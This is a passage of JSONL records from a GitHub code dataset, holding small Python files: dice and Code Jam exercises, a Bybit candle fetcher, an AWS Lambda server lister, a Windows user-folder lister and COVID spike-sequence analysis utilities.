**kwargs)\n        self.__equationIndices = []\n\n        for i in range(len(equations)):\n            equation = MathTex(equations[i], **kwargs)\n\n            start = 0 if i == 0 else self.__equationIndices[i - 1][1]\n            stop = start + len(equation)\n            \n            self.__equationIndices.append((start, stop))\n\n        #self.__mathTexEquations = MathTex(*equations, **kwargs)\n\n    def getEquationIndices(self, index: int or slice) -> Tuple[int, int]:\n        if isinstance(index, slice):\n            indices = self.__equationIndices[index]\n            start = indices[0][0]\n            stop = indices[len(indices) - 1][1]\n            return start, stop\n        else:\n            return self.__equationIndices[index]\n\n    def __getitem__(self, index: int or slice) -> VGroup:\n        indices = self.getEquationIndices(index)\n        return MathTex.__getitem__(self, slice(indices[0], indices[1]))\n\n","repo_name":"pumbas600/ENGGEN121GroupAssignment2","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73968073474","text":"import random\nkeep_going = True\n# while keep_going: \ndice = [0, 0, 0, 0, 0, 0]\nfor i in range(6):\n    dice[i] = random.randint(1, 6)\nprint(dice)\ndice.sort()\nprint(dice)\n\n# after sorting, all six dice are equal iff the first equals the last\nif dice[0] == dice[5]:\n    print(\"YAHTZEE!\")\nelse:\n    print(\"OTHER\")","repo_name":"zhanibekov/python-learning","sub_path":"chapter6/dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9673809113","text":"n = int(input())\na = []\nb = []\n\nfor i in range(n):\n    x, y = map(int, input().split())\n    a.append(x)\n    b.append(y)\n\nra = {}\nrb = {}\n\nfor i, j in zip(sorted(a), sorted(b)):\n    ra[i] = len(ra) + 1\n    rb[j] = len(rb) + 1\n\nd_sum = 0\n\nfor i, j in zip(a, b):\n    d_sum += (ra[i] - rb[j])**2\n\nprint(1 - 6 * d_sum / (n**3 - n))\n","repo_name":"letstatt/itmo","sub_path":"machine-learning/codeforces/e/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"11359320207","text":"from 
pybit.unified_trading import HTTP\nfrom datetime import datetime as dt\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nAPI_KEY = os.getenv('API_KEY')\nAPI_SECRET = os.getenv('API_SECRET')\n\n\nclass ByBitKline:\n\n def __init__(self):\n self.response = self.get_kline()\n self.object = self.create_kline_object()\n\n def get_kline(self):\n session = HTTP(testnet=False, api_key=API_KEY, api_secret=API_SECRET,)\n response = session.get_kline(\n category=\"linear\",\n symbol=\"BTCUSD\",\n interval=60,\n start=1670601600000,\n end=1670608800000,\n )\n return response\n\n def create_kline_object(self):\n lists = {\n \"List1\": self.response[\"result\"][\"list\"][0],\n \"List2\": self.response[\"result\"][\"list\"][1],\n \"List3\": self.response[\"result\"][\"list\"][2],\n }\n obj = {\n \"Return Message\": self.response[\"retMsg\"],\n \"Category\": self.response[\"result\"][\"category\"],\n \"Symbol\": self.response[\"result\"][\"symbol\"],\n \"Time\": dt.fromtimestamp(int(self.response[\"time\"]) / 1000.0).isoformat(' '),\n }\n for key, value in lists.items():\n dct = {\n f\"{key} Start time of the candle\": dt.fromtimestamp(int(value[0]) / 1000.0).isoformat(' '),\n f\"{key} Open price\": value[1],\n f\"{key} Highest price\": value[2],\n f\"{key} Lowest price\": value[3],\n f\"{key} Close price\": value[4],\n f\"{key} Trade Volume\": value[5],\n f\"{key} Turnover\": value[6],\n }\n obj.update(dct)\n return obj\n\n def write_kline_to_file(self):\n with open(\"kline.txt\", 'w') as f:\n for key, value in self.object.items():\n f.write(f\"{key} : {value}\\n\")\n\n def print_kline_from_file(self):\n with open('kline.txt', 'r') as f:\n for line in f:\n print(line.strip())\n return None\n\n","repo_name":"giedriusstankauskas/by_bit","sub_path":"kline.py","file_name":"kline.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13263490373","text":"#Basic Data Types Challenge 1: Letter Counter App\n\nprint(\"Welcome to the Letter Counter App\")\n\n#Get user input.\nname = input(\"\\nWhat is your name: \").title().strip()\nprint(\"Hello, \" + name + \"!\")\n\nprint(\"I will count the number of times that a specific letter occurs in a message.\")\nmessage = input(\"\\nPlease enter a message: \")\nletter = input(\"Which letter would you like to count the occurrences of: \")\n\n#Standardize to lower case.\nmessage = message.lower()\nletter = letter.lower()\n\n#Get the count and display results.\nletter_count = message.count(letter)\nprint(\"\\n\" + name + \", your message has \" + str(letter_count) + \" \" + letter + \"'s in it.\")\n","repo_name":"PacktPublishing/The-Art-of-Doing-Code-40-Challenging-Python-Programs-Today","sub_path":"2_Basic Data Types/Challenge_1_Letter_Counter_App.py","file_name":"Challenge_1_Letter_Counter_App.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"61"} +{"seq_id":"42198779344","text":"\"\"\"Handlers for API operations at /server level.\"\"\"\n\nimport json\nimport logging\nimport boto3\nimport ec2mapper\nimport myutils\n\nlogger = myutils.get_logger(__name__, logging.INFO)\n\n\n@myutils.log_calls(level=logging.DEBUG)\ndef get_handler(event, context): # pylint: disable=unused-argument\n \"\"\"REST API GET method to list Minecraft game servers.\n\n Parameters\n ----------\n event: dict, required\n API Event Input Format\n\n context: object, required\n Lambda Context runtime 
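The kline record above converts millisecond epoch timestamps with `dt.fromtimestamp(int(ms) / 1000.0).isoformat(' ')` in several places. A standalone sketch of that conversion with the timezone made explicit (the original relies on local time; UTC here is my choice, not the author's):

```python
from datetime import datetime, timezone

def ms_to_iso(ms):
    """Convert a millisecond epoch timestamp to an ISO string in UTC."""
    return datetime.fromtimestamp(int(ms) / 1000.0, tz=timezone.utc).isoformat(" ")

print(ms_to_iso(1670601600000))   # 2022-12-09 16:00:00+00:00
```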
methods and attributes\n\n Returns\n -------\n API Gateway Lambda Output Format: dict\n \"\"\"\n # gather data for HTTP response\n servers = gather()\n\n # return the HTTP payload\n return {\n 'statusCode': 200,\n 'body': json.dumps({\n 'servers': servers\n })\n }\n\n\n@myutils.log_calls\ndef gather():\n \"\"\"Return a list of Minecraft game servers.\"\"\"\n # initialize AWS SDK query filters\n filters = []\n filters.append(myutils.get_application_filter())\n filters.append(myutils.get_instance_filter())\n\n # invoke the AWS SDK to get relevant EC2 instances\n ec2_client = boto3.client('ec2')\n reservations = ec2_client.describe_instances(Filters=filters)\n\n servers = ec2mapper.parse(reservations)\n return servers\n","repo_name":"cpolanec/minecraft-server-controller","sub_path":"src/mcservers.py","file_name":"mcservers.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"10748959208","text":"#Este script simplemente imprime las carpetas que se encuentran dentro de C:\\Users.\r\n#La idea es pasarlo a Powershell.\r\n#github.com/gastonhz/Pywershell\r\nimport os\r\nimport re\r\nhostname=input(\"Ingresar host: \")\r\nruta=r\"\\\\\"+hostname+r\"\\c$\"+r\"\\Users\"+r\"\\\\\"\r\nusers=os.listdir(ruta)\r\nprint(\"Usuarios encontrados:\")\r\nprint(users)\r\n","repo_name":"gastonhz/Pywershell","sub_path":"Usuarios en PC.py","file_name":"Usuarios en PC.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4761290834","text":"'''covid-specific utilities and hardcoded values'''\n\nimport os\nimport re\nimport argparse\nimport datetime\nimport itertools as it\nfrom pathlib import Path\nimport warnings\n\nfrom verbose import verbose as v\nimport intlist\nimport wrapgen\nimport readseq\nimport sequtil\nimport mstringfix\nimport mutant\n\nMAX_TITLE_LENGTH=60 ## truncate long title names\nISO_DATE_REGEX = re.compile(r'\\d\\d\\d\\d-\\d\\d(-\\d\\d)?')\nISO_DATE_REGEX_DOTS = re.compile(r'\\.(\\d\\d\\d\\d-\\d\\d-\\d\\d)\\.')\nEPI_ISL_REGEX = re.compile(r'EPI_ISL_\\d+')\nLINEAGE_REGEX = re.compile(r'EPI_ISL_\\d+\\.(.*)')\n\nDEFAULTSEQFILE=\"Latest.fasta\"\n\ndef default_seqfile(seqfilename=DEFAULTSEQFILE):\n '''\n return the default file for input sequences;\n hunt around in various directories until you find it\n '''\n for d in [os.getenv('DATA'),\n '.',\n 'data',\n '..',\n '../data',\n ]:\n if not d:\n continue\n seqfile = Path(d) / seqfilename\n if seqfile.exists():\n return seqfile\n seqfile = Path(d) / (seqfilename + \".gz\")\n if seqfile.exists():\n return seqfile\n seqfile = Path(d) / (seqfilename + \".xz\")\n if seqfile.exists():\n return seqfile\n\n return None\n\n\ndef corona_args(ap):\n '''\n call this in the getargs() function,\n and these options will be added in\n '''\n\n ### Check --dates option; is format okay? are they in order?\n def datestring(yyyymmdd):\n ''' check format of dates; should be yyyy-mm-dd '''\n ## (but '.' 
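The Lambda handler above builds its `Filters` list from `myutils` helpers that are not shown. A hypothetical standalone sketch of the same `describe_instances` pattern; the tag names and values here are invented placeholders, not the project's actual filters:

```python
import boto3

def list_game_servers():
    """List EC2 instances matching tag/state filters (placeholder values)."""
    filters = [
        {"Name": "tag:Application", "Values": ["minecraft"]},
        {"Name": "instance-state-name", "Values": ["running", "stopped"]},
    ]
    ec2 = boto3.client("ec2")
    reply = ec2.describe_instances(Filters=filters)
    for reservation in reply["Reservations"]:
        for instance in reservation["Instances"]:
            print(instance["InstanceId"], instance["State"]["Name"])
```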
is also allowed to indicated a default)\n if (not re.match(r'\\d\\d\\d\\d-\\d\\d-\\d\\d',yyyymmdd)\n and yyyymmdd != '.'):\n raise ValueError(f'Invalid date {yyyymmdd}; '\n f'should be in yyyy-mm-dd format')\n return yyyymmdd\n\n class CheckDates(argparse.Action):\n ''' check that the dates are good and that they are in order '''\n def __call__(self,parser,namespace,dates,option_string=None):\n dates = [datestring(date) for date in dates]\n if not any(bool(date == \".\") for date in dates):\n if dates[0] > dates[1]:\n parser.error(f'Dates out of order: {dates}')\n setattr(namespace,self.dest,dates)\n\n paa = ap.add_argument\n #faa = ap.add_argument_group('File input options').add_argument\n paa(\"--input\",\"-i\",type=Path,\n default=default_seqfile(),\n help=\"input file with aligned sequences (first is reference)\")\n paa(\"--nseq\",type=int,default=0,\n help=\"read at most NSEQ sequences\")\n paa(\"--filterbyname\",\"-f\",nargs='+',\n help=\"Only use sequences whose name matches this pattern\")\n paa(\"--xfilterbyname\",\"-x\",nargs='+',\n help=\"Do not use sequences whose name matches this pattern\")\n paa(\"--dates\",\"-d\",nargs=2,type=datestring,action=CheckDates,\n help=\"Only use seqs in range of dates (two dates, yyyy-mm-dd format)\")\n paa(\"--days\",type=int,default=0,\n help=\"Consider date range of DAYS days ending on the last sampled date\")\n paa(\"--stripdashcols\",action=\"store_true\",\n help=\"Strip columns with dash in reference sequence\")\n paa(\"--keeplastchar\",action=\"store_true\",\n help=\"Do not strip final stop codon from end of sequences\")\n paa(\"--keepx\",action=\"store_true\",\n help=\"Keep sequences that include bad characters, denoted X\")\n paa(\"--skipx\",action=\"store_false\",dest='keepx',\n help=\"Skip sequences that include bad characters, denoted X\")\n ap.set_defaults(keepx=False)\n paa(\"--title\",\n help=\"use this TITLE in plots\")\n\n#### Routines for parsing sequence names\n\nxpand_WHO_Pangolin = {\n ## dict to convert WHO lineage names to pango pattern\n 'Alpha': r'(B\\.1\\.1\\.7)|(Q\\.[1-9].*)',\n 'Beta': r'B\\.1\\.351',\n 'Gamma': r'P\\.1.*',\n 'Delta': r'(B\\.1\\.617\\.2)|(AY\\.[1-9].*)',\n 'Lambda': r'C\\.37',\n 'Mu': r'B\\.1\\.621(\\.1)?',\n 'Omicron': r'(B\\.1\\.1\\.529)|(BA\\.[1-9].*)',\n}\ndef expand_who_name_to_pangolin_pattern(patt):\n '''\n if patt is one of the WHO names, then\n replace it with its associated pangolin\n pattern\n '''\n return xpand_WHO_Pangolin.get(patt,patt)\n\nBASELINE_MSTRINGS = {\n 'Wuhan' : \"\",\n 'BA.2' : \"T19I,L24-,P25-,P26-,A27S,G142D,V213G,G339D,S371F,S373P,S375F,T376A,D405N,R408S,K417N,N440K,S477N,T478K,E484A,Q493R,Q498R,N501Y,Y505H,D614G,H655Y,N679K,P681H,N764K,D796Y,Q954H,N969K\",\n 'BA.5' : \"T19I,L24-,P25-,P26-,A27S,H69-,V70-,G142D,V213G,G339D,S371F,S373P,S375F,T376A,D405N,R408S,K417N,N440K,L452R,S477N,T478K,E484A,F486V,Q498R,N501Y,Y505H,D614G,H655Y,N679K,P681H,N764K,D796Y,Q954H,N969K\",\n 'BA.2.75': \"T19I,L24-,P25-,P26-,A27S,G142D,K147E,W152R,F157L,I210V,V213G,G257S,G339H,S371F,S373P,S375F,T376A,D405N,R408S,K417N,N440K,G446S,N460K,S477N,T478K,E484A,Q498R,N501Y,Y505H,D614G,H655Y,N679K,P681H,N764K,D796Y,Q954H,N969K\",\n 'XBB.1.5': \"T19I,L24-,P25-,P26-,A27S,V83A,G142D,Y144-,H146Q,Q183E,V213E,G252V,G339H,R346T,L368I,S371F,S373P,S375F,T376A,D405N,R408S,K417N,N440K,V445P,G446S,N460K,S477N,T478K,E484A,F486P,F490S,Q498R,N501Y,Y505H,D614G,H655Y,N679K,P681H,N764K,D796Y,Q954H,N969K\",\n\n}\n\ndef get_baseline_mstring(lineage='Wuhan'):\n mstring = BASELINE_MSTRINGS.get(lineage,\"\")\n mstring = 
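The `CheckDates` action in covid.py above validates date format and ordering at parse time. A condensed, runnable variant of that pattern (my simplification, not the project's exact code); note that ISO `yyyy-mm-dd` strings compare correctly as plain strings, which is why the `>` comparison works:

```python
import argparse
import re

class CheckDates(argparse.Action):
    """Validate two yyyy-mm-dd strings and require them in order ('.' = open end)."""
    def __call__(self, parser, namespace, values, option_string=None):
        for v in values:
            if v != "." and not re.fullmatch(r"\d{4}-\d{2}-\d{2}", v):
                parser.error(f"invalid date {v!r}; expected yyyy-mm-dd")
        if "." not in values and values[0] > values[1]:
            parser.error(f"dates out of order: {values}")
        setattr(namespace, self.dest, values)

ap = argparse.ArgumentParser()
ap.add_argument("--dates", nargs=2, action=CheckDates)
print(ap.parse_args(["--dates", "2021-01-01", "2021-06-30"]).dates)
```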
mstringfix.mstring_brackets(mstring)\n return mstring\n\ndef reset_baseline(firstseq,lineage):\n '''use lineage instead of Wuhan as baseline \"first\" sequence'''\n mut_mgr = mutant.MutationManager(firstseq)\n base_mstring = get_baseline_mstring(lineage)\n if not base_mstring:\n return firstseq\n base_mutant = mutant.Mutation(base_mstring)\n base_seq = mut_mgr.seq_from_mutation(base_mutant)\n return base_seq \n\ndef get_isl(fullname):\n '''return EPI_ISL number from the sequence name'''\n epi_match = EPI_ISL_REGEX.search(fullname)\n return epi_match[0] if epi_match else \"X\"\n\ndef get_lineage_from_name(name):\n '''get pango lineage by parsing the sequence name'''\n m = LINEAGE_REGEX.search(name)\n linpatt = m[1] if m else None\n #try:\n # tokens = name.split('.',6)\n # lintok = tokens[6]\n #except IndexError:\n # lintok = None\n #if linpatt != lintok:\n # print(\"name=\",name,\"patt:\",linpatt,\"token:\",lintok)\n return linpatt\n\ndef date_fromiso(s):\n '''return datetime.date object from date string in yyyy-mm-dd format'''\n ## if \".\" or invalid (quite different cases!), return None\n ## problem with raising error is that many badly formatted dates out there\n ## this routine is necessary since date.fromisoformat() function is\n ## not available until python version 3.7\n if isinstance(s, datetime.date):\n return s\n try:\n yyyy,mm,dd = s.split(\"-\")\n dt = datetime.date(int(yyyy),int(mm),int(dd))\n return dt\n except (ValueError,AttributeError,TypeError):\n ## various things can go wrong\n return None\n\ndef date_from_seqname(sname):\n '''extract date string from sequence name'''\n try:\n tokens = sname.split('.')\n datestr = tokens[4]\n except IndexError:\n v.vprint_only(5,\"Invalid name:\",sname)\n datestr = sname\n if not ISO_DATE_REGEX.match(datestr):\n v.vprint_only(5,\"Invalid date:\",datestr,sname)\n m = ISO_DATE_REGEX_DOTS.search(sname)\n datestr = m[1] if m else None\n return date_fromiso(datestr)\n\ndef count_bad_dates(seqlist):\n return sum(date_from_seqname(s.name) is None for s in seqlist)\n\ndef range_of_dates(seqlist):\n '''return tuple of iso-formatted dates'''\n assert isinstance(seqlist,list)\n dates = [date_from_seqname(s.name) for s in seqlist]\n dates = [d for d in dates if d is not None]\n v.vprint(\"Range of dates based on\",len(dates),\"sequences\")\n return (min(dates).isoformat(),\n max(dates).isoformat())\n\ndef filter_by_date(seqs,fromdate,todate,keepfirst=False):\n '''input seqs is iterable (list or iterator); output is generator'''\n\n f_date = date_fromiso(fromdate)\n t_date = date_fromiso(todate)\n\n for n,s in enumerate(seqs):\n if keepfirst and n == 0:\n yield s\n continue\n d = date_from_seqname(s.name)\n if not d:\n continue\n if f_date and f_date > d:\n continue\n if t_date and t_date < d:\n continue\n yield s\n\nsite_specifications = {\n \"RBD\" : \"330-521\",\n \"NTD\" : \"14-292\",\n \"NTDss\" : \"13-20,140-158,242-264\",\n \"xNTDss\" : \"13-17,19,20,69,70,138-141,143-158,242-264\",\n \"NTDss_trunc\" : \"140-158,242-264\",\n \"NTDish\" : \"13,18,20,69,70,141-144,152,153,157,242-244,253-257,262\",\n \"RBDish\" : \"367,417,439,440,452,453,477,478,484,490,494,501,520,614\",\n \"RBDplus\" : \"330-521,655,675,679,681\", ## obsolete, now use RBD+Furin\n \"Furin\" : \"655,675,677,679,681,950\",\n}\n\ndef spike_sites(sitespec):\n '''return list of integers, site numbers, corresponding to sitespec string'''\n ## sitespec may be of the form:\n ## '13-20,140-158' -- integer list\n ## 'RBD' -- receptor binding domain\n ## 'NTD', 'NTDss' -- N-terminal 
domain (supersite)\n ## Combinations of the above using \"+\" and \"-\"\n ## 'RBD+NTD' -- include sites in either domain\n ## 'NTD-18' -- all sites in NTD except 18\n ## 'RBD+18' -- all sites in RBD plus site 18\n ## Problematic (don't do this, if you can avoid it):\n ## Because '-' can indicate a 'remove site' or can indicate a numeric range\n ## there are some unfortunate ambiguities\n ## 'RBD+1-10' -- Ambiguous:\n ## RBD plus 1 minus 10 /or/ RBD plus 1 through 10 ??\n ## You should get RBD plus 1 thru 10, but be careful\n ## NTDss+69+70-18+RBD -- worse than ambiguous, will not include 70, will include 18\n ## because \"70-18\" -> \"\" since it's an invalid range\n ## NTDss-18+69+70+RBD -- will give that right answer\n ## 69-70+NTDss-18+RBD -- may give right answer, but awkward formulation\n ##\n site_specs_internal = {key.upper(): value for key,value in site_specifications.items()}\n def get_intlist(s):\n return intlist.string_to_intlist( site_specs_internal.get(s.upper(),s) )\n xsite = set() ## set of sites to be excised\n sites = set() ## set of sites to be included\n for spec in sitespec.split('+'):\n if re.match(r'\\d.*',spec):\n sites.update(get_intlist(spec))\n continue\n specx = spec.split('-')\n sites.update(get_intlist(specx[0]))\n for sx in specx[1:]:\n xsite.update( get_intlist(sx) )\n sites -= xsite\n return sorted(sites)\n\n\nCONTINENTS = [\"United-Kingdom\",\n \"Europe-minus-United-Kingdom\",\n \"North-America\",\n \"Asia\",\n \"Africa\",\n \"South-America\",\n \"Oceania\",\n]\nABBREV_CONTINENTS = {\"United-Kingdom\" : \"UK\",\n \"Europe-minus-United-Kingdom\": \"Eu-UK\",\n \"North-America\" : \"NAmer\",\n \"Asia\" : \"Asia\",\n \"Africa\" : \"Africa\",\n \"South-America\" : \"SAmer\",\n \"Oceania\" : \"Ocean\",\n}\n\ndef parse_continents(withglobal=False):\n '''\n returns a list of three-element tuples (cx,c,x)\n cx: full name of region, possibly including '-minus-'\n c: included part of region, before the '-minus-'\n x: excluded part of region, after the '-minus-'\n [in most cases, cx=c and x=None]\n '''\n cx_c_x=[]\n if withglobal:\n cx_c_x.append((\"Global\",\"Global\",None))\n for cx in CONTINENTS:\n if \"-minus-\" in cx:\n c,x = cx.split(\"-minus-\")\n else:\n c,x = cx,None\n cx_c_x.append((cx,c,x))\n return cx_c_x\n\ndef filename_prepend(pre,file):\n '''prepend a string to a file name; eg\n \"pre\",\"file\" -> \"prefile\", but also\n \"pre\",\"directory/file\" -> \"directory/prefile\"\n '''\n ## alt: re.sub(r\"(.*/)?([^/]+)\",r\"\\1\"+pre+r\"\\2\",file)\n if not file:\n return file\n directory,base = os.path.split(file)\n return os.path.join(directory,pre+base)\n\ndef get_title(args):\n '''produce default title for plots and tables'''\n if args.title:\n return \"Global\" if args.title=='.' 
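`spike_sites` above delegates to `intlist.string_to_intlist`, a module that is not included in the record. A plausible minimal reimplementation of what that helper must do, expanding comma-separated ranges into a sorted site list (an assumption about its behavior, not the project's actual code):

```python
def string_to_intlist(spec):
    """Expand '13-20,140,242-244' into a sorted list of site numbers."""
    sites = set()
    for token in spec.split(","):
        if "-" in token:
            lo, hi = token.split("-")
            sites.update(range(int(lo), int(hi) + 1))
        else:
            sites.add(int(token))
    return sorted(sites)

print(string_to_intlist("13-20,242-264")[:6])   # [13, 14, 15, 16, 17, 18]
```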
else args.title\n if args.filterbyname:\n newfilterbynames = [re.sub('-minus-',' w/o ',name)\n for name in args.filterbyname]\n title = \"+\".join(newfilterbynames)\n else:\n title = \"Global\"\n if args.xfilterbyname:\n title = title + \" w/o \" + \"+\".join(args.xfilterbyname)\n if len(title) > MAX_TITLE_LENGTH:\n title = title[:MAX_TITLE_LENGTH-3]+\"...\"\n return title\n\ndef get_first_item(items,keepfirst=True):\n '''\n get first item in iterable, and and put it back;\n works when the iterable is a list or an iterator\n if keepfirst==False, then don't put it back\n '''\n warnings.warn(\"use sequtil.get not covid.get\")\n return sequtil.get_first_item(items,keepfirst=keepfirst)\n\ndef read_filter_seqfile(args,**kwargs):\n '''\n read sequence file from args.input,\n and filter according to args,\n return a generator of sequences\n '''\n seqs = read_seqfile(args,**kwargs)\n seqs = filter_seqs(seqs,args)\n\n return seqs\n\ndef read_seqfile(args,**kwargs):\n '''\n read sequences file from args.input\n return a generator of sequences\n '''\n seqs = readseq.read_seqfile(args.input,badchar='X',**kwargs)\n if args.verbose:\n seqs = wrapgen.keepcount(seqs,\"Sequences read:\")\n return seqs\n\n\ndef fix_seqs(seqs,args):\n '''\n seqs = fix_seqs(seqs,args)\n will return sequences with stripdashcols (obsolete)\n and with last character (if it's $) stripped\n and\n '''\n ## ...a bit heavy-handed, and assumes first seq is still there\n\n ## we peek at first sequence, but do not remove it from seqs\n first,seqs = sequtil.get_first_item(seqs)\n\n if \"-\" in first.seq and args.stripdashcols:\n seqs = sequtil.stripdashcols(first.seq,seqs)\n\n if not args.keeplastchar:\n if first.seq and first.seq[-1] in \"$*X\":\n stop_codon = first.seq[-1]\n first.seq = first.seq[:-1]\n seqs = striplastchars(seqs,len(first.seq))\n\n if not args.keepx:\n seqs = (s for s in seqs if \"X\" not in s.seq)\n\n return seqs\n\ndef striplastchars(seqs,seqlen):\n '''\n truncate all sequences to length seqlen;\n '''\n for s in seqs:\n s.seq = s.seq[:seqlen]\n yield s\n\ndef filter_seqs(seqs,args):\n '''filter sequences according to args: by date, by pattern, by nseq'''\n ## by date first so multiple runs will have the same date range\n ## with --days option\n seqs = filter_seqs_by_date(seqs,args)\n seqs = filter_seqs_by_pattern(seqs,args)\n seqs = fix_seqs(seqs,args)\n if args.nseq:\n seqs = it.islice(seqs,args.nseq+1)\n if args.verbose:\n seqs = wrapgen.keepcount(seqs,\"Sequences filtered:\")\n\n return seqs\n\ndef xrepair(seqs,X='X'):\n '''replace all occurrences of X with the ancestral form in first sequence'''\n ## This seems dangerous!! Use with care ... 
or not at all.\n first,seqs = sequtil.get_first_item(seqs)\n ref = first.seq\n for s in seqs:\n if X in s.seq:\n ss = list(s.seq)\n for n in range(len(ss)):\n if ss[n] == X:\n ss[n] = ref[n]\n s.seq = \"\".join(ss)\n yield s\n\ndef lastdate_byfile(file,seqs=None):\n '''return the last date in the range of dates'''\n ## to get last date\n ## 1/ get modification date of input file\n ## 2/ if that doesn't work (eg, if file not found), get today's date\n ## 3/ if that doesn't work (but why wouldn't it?), get last date in dataset\n ## 4/ if that doesn't work, raise RuntimeError\n ## Note, if seqs is None, then skip step 3\n\n lastdate=None ## in case nothing works!\n try:\n mtime = os.path.getmtime(file)\n lastdate = datetime.date.fromtimestamp(mtime).isoformat()\n except FileNotFoundError:\n try:\n lastdate = datetime.date.today().isoformat()\n except: ## don't think this will ever happen\n if seqs:\n seqs = list(seqs)\n _,lastdate = range_of_dates(seqs)\n\n if lastdate is None:\n raise RuntimeError('Cannot find last date for date range')\n\n return lastdate\n\ndef date_range_from_args(args):\n '''return list of two iso-formatted dates (start and stop);\n obtain what /should/ be in args.dates, but if it is not set,\n then infer what it should be from args.days'''\n if args.dates:\n return [(None if date=='.' else date)\n for date in args.dates]\n if args.days:\n lastdate = lastdate_byfile(args.input)\n t = date_fromiso(lastdate)\n f = t - datetime.timedelta(days=args.days)\n return [f.isoformat(),t.isoformat()]\n return [None,None]\n\ndef expand_date_range(daterange,daysperweek=7):\n '''pad the date range by a few (or many) days out front\n so that weekly and/or cumulative counts are mainteined\n correctly'''\n start_date,stop_date = daterange\n if start_date is None or start_date == '.':\n return daterange\n if daysperweek == 0:\n start_date = None\n elif daysperweek > 1:\n start_date = date_fromiso(start_date)\n start_date = start_date - datetime.timedelta(days=daysperweek-1)\n start_date = start_date.isoformat()\n return [start_date,stop_date]\n\n\ndef filter_seqs_by_date(seqs,args,keepfirst=True):\n '''passes through seq's whose date is in range specified by args;\n also, ensures that args.dates is set to range of dates (eg, if range\n specified by --days, then set args.dates to be consistent with that)\n '''\n\n if not args.days and not args.dates:\n return seqs\n if args.days and args.dates:\n raise RuntimeError(\"Cannot specify both --days AND --dates\")\n\n if args.days:\n args.dates = date_range_from_args(args)\n\n if args.dates:\n seqs = filter_by_date(seqs,args.dates[0],args.dates[1],keepfirst=keepfirst)\n\n return seqs\n\ndef filter_seqs_by_pattern(seqs,args,keepfirst=True):\n '''input is iterable seqs; output is generator seqs'''\n\n keepers = []\n xcludes = []\n if args.filterbyname:\n for name in args.filterbyname:\n patt,_,xpat = name.partition(\"-minus-\")\n patt = expand_who_name_to_pangolin_pattern(patt)\n if patt != \"Global\":\n keepers.append(patt)\n if xpat:\n xcludes.append(xpat)\n if args.xfilterbyname:\n for name in args.xfilterbyname:\n name = expand_who_name_to_pangolin_pattern(name)\n xcludes.append(name)\n\n ## Use r\"\\.\"+ to ensure that names have to be preceded by a dot\n keepers = [r\"\\.\"+patt for patt in keepers]\n xcludes = [r\"\\.\"+xpat for xpat in xcludes]\n\n if keepers:\n seqs = sequtil.filter_by_patternlist(seqs,keepers,\n keepfirst=keepfirst)\n if xcludes:\n seqs = sequtil.filter_by_patternlist_exclude(seqs,xcludes,\n keepfirst=keepfirst)\n\n 
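`lastdate_byfile` and `date_range_from_args` above derive an N-day analysis window ending at the input file's modification date. A self-contained sketch of that core idea (illustrative; the printed window depends on when the file was touched):

```python
import datetime
import os
import tempfile

def date_window(path, days):
    """Return (first, last) ISO dates for a window of `days` ending at the file's mtime."""
    last = datetime.date.fromtimestamp(os.path.getmtime(path))
    first = last - datetime.timedelta(days=days)
    return first.isoformat(), last.isoformat()

with tempfile.NamedTemporaryFile() as f:      # any existing file works
    print(date_window(f.name, 30))            # e.g. ('2024-05-01', '2024-05-31')
```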
return seqs\n\nSARS_REGIONS = '''\nSP 1 13\nNTD 27 292\nRBD 330 521\nRBM 438 506\nSD1 528 590\nSD2 591 679\n#S1 685 685\n#S2 686 686\nFP 816 833\nHR1 908 985\nCH 986 1035\nCD 1076 1140\nHR2 1162 1204\nTM 1214 1236\n'''\n\nMERS_REGIONS='''\nSP 1 18\nNTD 18 350\nRBD 382 588\nRBM 483 566\nSD1 595 656\nSD2 657 747\n#S1/S2 748 749 The cleavage site\nUH 816 851\nFP 880 900\nCR 901 991\nHR1 992 1054\nCH 1055 1109\nBH 1110 1149\nSD3 1150 1206\nHR2 1246 1294\nTM 1295 1329\n'''\n\ndef get_srlist(virus=\"SARS\"):\n ''' provides a tuple of three lists: n,x,y\n n = name of region\n x = start site\n y = stop site\n '''\n n=[]\n x=[]\n y=[]\n regions = MERS_REGIONS if virus.lower() == \"mers\" else SARS_REGIONS\n for sr in regions.split('\\n'):\n srs = sr.split()\n if len(srs) == 3 and srs[0][0]!='#':\n n.append(srs[0])\n x.append(int(srs[1]))\n y.append(int(srs[2]))\n return n,x,y\n\n## EXAMPLE USAGE:\n# f = max(e)/2\n# dy = -0.04*f\n# dyl = -0.12*f\n#\n# for srx,sry,srn in zip(srlistx,srlisty,srlistn):\n# plt.plot([srx,sry],[dy,dy],label=srn,linewidth=4)\n# delta = 8 if sry-srx < 15 else 3 if sry-srx < 25 else 0\n# plt.text(srx-delta,dyl,srn)\n# plt.legend(loc=\"upper left\",title=\"Regions\",bbox_to_anchor=(1,1))\n","repo_name":"jt-lanl/cov-voc","sub_path":"covid.py","file_name":"covid.py","file_ext":"py","file_size_in_byte":20743,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23452683261","text":"#!/usr/bin/env python3\n\nimport sys\n\ndef read_configuration():\n tmp = sys.stdin.readline().split()\n return (int(tmp[0]), list(map(int, tmp[1])))\n\nif __name__ == '__main__':\n T = int(sys.stdin.readline())\n \n for t in range(1, T+1):\n S_max, audience = read_configuration()\n \n total_added, standing = 0, audience[0]\n for shyness in range(1, S_max+1):\n added = 0\n if audience[shyness] > 0 and standing < shyness:\n added += shyness - standing\n total_added += added\n standing += audience[shyness] + added\n \n print('Case #{}: {}'.format(t, 